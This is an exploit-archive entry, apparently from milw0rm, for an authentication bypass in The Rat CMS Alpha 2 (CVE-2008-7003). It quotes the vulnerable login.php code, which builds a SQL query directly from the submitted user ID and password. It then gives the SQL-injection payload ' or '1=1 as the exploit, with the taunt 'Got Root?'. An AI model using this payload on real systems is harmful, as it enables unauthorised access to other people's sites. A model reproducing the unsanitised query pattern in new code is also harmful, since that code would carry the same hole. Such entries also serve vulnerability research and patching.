The Rat CMS Alpha 2 - Authentication Bypass
| EKU-ID: 15326 | CVE: OSVDB-57157;CVE-2008-7003 | OSVDB-ID: |
| Author: x0r | Published: 2008-12-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 15326 | CVE: OSVDB-57157;CVE-2008-7003 | OSVDB-ID: |
| Author: x0r | Published: 2008-12-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
Email: andry2000@hotmail.it
--------------------------------
Bug In: \login.php
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
Exploit: ' or '1=1
^^ Got Root?
# milw0rm.com [2008-12-15]